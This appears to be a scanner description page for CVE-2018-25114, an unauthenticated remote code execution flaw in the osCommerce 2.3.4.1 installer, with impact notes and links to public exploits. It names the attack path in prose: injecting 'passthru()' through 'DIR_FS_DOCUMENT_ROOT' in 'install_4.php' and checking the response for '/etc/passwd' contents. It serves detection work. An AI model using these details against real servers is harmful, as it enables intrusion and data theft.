CVE-2018-25114 Scanner

osCommerce Online Merchant is an open-source shopping cart solution used by businesses of all sizes for managing e-commerce transactions. Developed and maintained by a global community, it serves as an alternative to proprietary shopping cart software. It allows businesses to set up a customizable, scalable online storefront. The platform is popular among small and medium-sized e-commerce businesses due to its flexibility and large support community. Despite its robustness, it's essential for users to ensure proper installation and configuration settings. osCommerce aids businesses in efficiently managing product listings, customer orders, and online payments.

Remote Code Execution (RCE) is a critical vulnerability that allows attackers to execute arbitrary code on a vulnerable server or system via web-based application constraints. By exploiting insecure default configurations, especially those that lack proper authentication protocols, attackers can inject malicious code. In this instance, if the vulnerable installation files remain accessible post-installation, this vulnerability can be effortlessly leveraged. Successful exploitation could result in unauthorized access to sensitive data or a full system compromise. RCE is considered a serious security threat due to its potential to severely disrupt services and steal information.

The osCommerce 2.3.4.1 platform is susceptible to RCE due to inadequate default configurations and authentication mechanisms within the installation routine. Specifically, the issue arises when the '/install/' directory of the platform is left intact after initial setup, allowing unauthenticated users to execute arbitrary PHP commands. Attackers can navigate to 'install_4.php' and exploit the insecure endpoint to inject commands such as 'passthru()' into the parameter 'DIR_FS_DOCUMENT_ROOT'. Detection of such vulnerabilities involves scrutinizing HTTP responses for specific patterns in the '/etc/passwd' file to confirm access.

Exploitation of this vulnerability can lead to serious consequences, including the full compromise of the hosting server. Attackers can gain unintended access to sensitive files or database contents, manipulate data, deface websites, or disrupt services, potentially causing significant data breaches and financial loss. Once control over the system is achieved, attackers might deploy further payloads, such as worms or ransomware, exacerbating the initial impact. The integrity and availability of critical business operations could be severely undermined due to these unauthorized administrative activities.

REFERENCES

• https://www.exploit-db.com/exploits/50128
• https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
• https://www.exploit-db.com/exploits/44374
• https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution